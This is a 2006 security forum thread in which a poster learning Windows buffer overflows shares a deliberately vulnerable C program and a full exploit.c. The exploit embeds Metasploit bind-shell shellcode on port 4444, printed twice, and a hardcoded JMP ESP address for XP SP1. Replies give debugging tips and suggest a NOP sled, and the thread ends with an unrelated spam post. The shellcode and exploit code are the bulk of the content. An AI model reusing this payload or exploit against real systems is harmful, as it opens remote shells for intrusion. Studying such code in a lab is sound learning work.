 | |
| |||||||
| Home | Register | Projects | Blogs | FAQ | Calendar | Search | Today's Posts | Mark Forums Read | Free Directory | Free DNSReport | Tags |
| Notices |
| Programming Discuss about the various programming languages (HTLM/PHP/ASP/C#/C++/Java etc..) |
Help with write exploitThis is a discussion on "Help with write exploit" within the Programming part of the Computer Security: Discussions section; HI all =) Now I study (simple) Buffer Overflow in windows. But i need some help ;) This is simple vulnerable Program: vuln.c include<stdio.h> #include<string.h> #include<windows.h> int main(int ... |
 |
| | LinkBack (1) | Thread Tools | Display Modes |
28-07-06
| |||
| |||
 Help with write exploit HI all =) Now I study (simple) Buffer Overflow in windows. But i need some help ;) This is simple vulnerable Program: vuln.c include<stdio.h> #include<string.h> #include<windows.h> int main(int argc,char *argv[]){ char buf[15]; //DebugBreak(); if (argc != 2){ return -1; } strcpy(buf,argv[1]); return 0x0; } a then after compile: c:\vuln.exe AAAAAAAAAAAAAAAAAAAAAAAA EIP rewrite to 41414141 , ok 41 = A ;) OK, i find JMP ESP etc. ntdll.dll ( in my win xp sp1 eng find address 77F9980F ) -> ret = \x0F\x98\xF9\x77 for exploit Then i need shellcode for exploit, i use from METASPLOIT project Shellcode bind port on 4444 "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\ x73\x17\x4f\x85" "\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\ x85\x7c\xcd\x19" "\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\ x84\xc5\x13\x05" "\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\ x84\xc1\xa9\xb0" "\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\ x42\xc4\x6a\x74" "\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\ x89\x64\x13\x15" "\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\ xda\x71\xc5\x14" "\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\ x89\xa4\xc3\x53" "\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\ x53\xa6\x5f\xce" "\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\ x85\x2f\x98\xdf" "\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\ xcc\xa9\xd1\xeb" "\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\ x68\xd3\xa3\x18" "\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\ x52\xa6\x47\xc6" "\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\ x7a\x7a\x9c\x16" "\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\ xb5\x1e\x58\x1f" "\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\ xb4\xf4\xcb\x1c" "\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\ xd0\x0b\xcb\x18" "\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\ xc6\x62\xdc\x4f" "\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\ xdc\xdc\x33\xc8" "\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\ xa1\x13\x99\x4e" "\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\ x08\x6b\xbc\x5f" "\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\ x7a\x5a\x98\x27" "\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\ xf0\x2f\xf0\xe2" "\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\ x7a\xfc\x67\x3a" "\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\ x7a\xff\x98"; The exploit string should look like this: [AAAAAAAAAAAAAAAAAAAA| EIP | SHELLCODE ] EIP must rewrite to \x0F\x98\xF9\x77 address This is explopit for vulnerable Program ;) exploit.c /* * test exploit for vuln.c by haluZniq ;) */ #include <stdio.h> #include <windows.h> int main(void) { char EvilBuff[1024]; // metasploit shellcode LPORT=4444 char shellcode[] = "\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\ x73\x17\x4f\x85" "\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\ x85\x7c\xcd\x19" "\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\ x84\xc5\x13\x05" "\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\ x84\xc1\xa9\xb0" "\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\ x42\xc4\x6a\x74" "\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\ x89\x64\x13\x15" "\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\ xda\x71\xc5\x14" "\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\ x89\xa4\xc3\x53" "\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\ x53\xa6\x5f\xce" "\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\ x85\x2f\x98\xdf" "\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\ xcc\xa9\xd1\xeb" "\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\ x68\xd3\xa3\x18" "\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\ x52\xa6\x47\xc6" "\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\ x7a\x7a\x9c\x16" "\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\ xb5\x1e\x58\x1f" "\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\ xb4\xf4\xcb\x1c" "\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\ xd0\x0b\xcb\x18" "\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\ xc6\x62\xdc\x4f" "\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\ xdc\xdc\x33\xc8" "\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\ xa1\x13\x99\x4e" "\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\ x08\x6b\xbc\x5f" "\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\ x7a\x5a\x98\x27" "\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\ xf0\x2f\xf0\xe2" "\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\ x7a\xfc\x67\x3a" "\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\ x7a\xff\x98"; char jmpesp_offset[] = "\x0F\x98\xF9\x77"; char Prog[1024] = "vuln "; printf("\n> test exploit for vuln\n"); memset(EvilBuff, 0x00, 1024); memset(EvilBuff, 0x41, 20); strncat(EvilBuff, jmpesp_offset, 1024); strncat(EvilBuff, shellcode, 1024); strncat(Prog, EvilBuff, 1024); printf("> Exploiting!\n"); system(Prog); return 0; } ..compile, test it, but exploit not work :(( where is a buq? What I am wrong writen? What missing in exploit, so as exploiting him? ps: sorry for my poor english language ;) Thnx for all, have a nice day, haluZniq :]  |
| Sponsor | ||
| ||
| |
|
28-07-06
| ||||
| ||||
| This is probably the Data Prevention Execution in SP2, the SEH exploitation might work around this or just disable it: right click My Computer > Advanced > Performance > Settings > Data Execution Prevention > and select the 1st occurence wich should looks like: "Turn on DEP for essential Windows programs and service only" You're welcome and thank you to participate to the forum. |
|
29-07-06
| |||
| |||
| Hi, thanx u for answer. But I testing exploiting vuln.c in WIN XP SP1, There is no DEP, i think ;). SEH exploitation i start study after complet understand simple buffer overflov in win32 :) There is my problem: -i run exploit C:\>exploit > test exploit for vuln > Exploiting! 'Í↓Ҥôkť¤Ýs♫{ť7"Ĺ‼♣ť¤Âo"Ä{}̤¬Ä"Ác°y▲Xă˝ĎěHDŕNBÄjt ů' is not recognized as an int ernal or external command, operable program or batch file. C:\> I dont understand, why write this error. where is a bug in exploit? :( - exploit string should look like this? [AAAAAAAAAAAAAAAAAAAA| EIP | SHELLCODE ] somebody wrote to me this: [buffer - garbage data] - EIP (jmp esp) - [nopsled] - [shellcode] - which is corrrect? Thanx u very much for all answer, are that precious information :) Have a nice day, haluZniq |
|
29-07-06
| ||||
| ||||
| can't say you this because this could come from various things.. The best to do is to run your vuln.c with an attached debugger, add a breakpoint just before EIP wich should be callled , and add another one just up your shellcode, then see if you reach each bp correctly, if you cant see much with this, try to examine the execution step at step with F7 in ollydbg. Debugging is the only way for you to understand what is bad here. |
|
27-12-06
| |||
| |||
| Quote:
You must start testing again by overflowing your program again, and see in ollydbg when the ESP gets overwritten by your user supplied data. Put the right amount of nopsleds behind your RETaddr, and after that, your shellcode. This should work  Grtz, Yorgi |
. SEH exploitation i start study after
|
04-09-08
| |||
| |||
| Css faq Hi................. Log in this website http;//www.css-faq.com/this is CSS programming.This website also guides you through the most time-efficient manners to manipulate these functions. It is equally suitable for all those people who have an interest in web design, from the professional to the enthusiast, including freelancers and bloggers. There is a short and made-easy tutorial on how to start HTML and CSS. It is planned for those who are just starting to know CSS and those who were not able to write one. Thank you CSS News CSS forums CSS Tools |
| Sponsor | ||
| ||
| |
|
| | |
| exploit, help, write | |
LinkBacks (?)
LinkBack to this Thread: http://heapoverflow.com/f0rums/programming/1236-help-write-exploit.html | ||||
| Posted By | For | Type | Date | |
| help - Members and Communities tagged with help - Zoints | This thread | Refback | 26-01-08 06:26 | |
| Thread Tools | |
| Display Modes | |
Linear Mode
| |
|
Similar Threads | ||||
| Thread | Thread Starter | Forum | Replies | Last Post |
| PMSoftware Remote windowz root Exploit version 2 | Private | 20 | 11-11-08 04:31 | |
| IDM advisory PoC exploit | 0day | 7 | 18-06-08 03:30 | |
| Mercury imap4 remote BOF exploit | 0day | 9 | 25-01-08 07:36 | |
| Microsoft Jet Database Engine Bind Shell Exploit | zaero | Public | 4 | 20-07-06 05:08 |
| Mercury imap4 server remote buffer overflow exploit | Deumas-1 | Public | 1 | 24-09-05 11:29 |
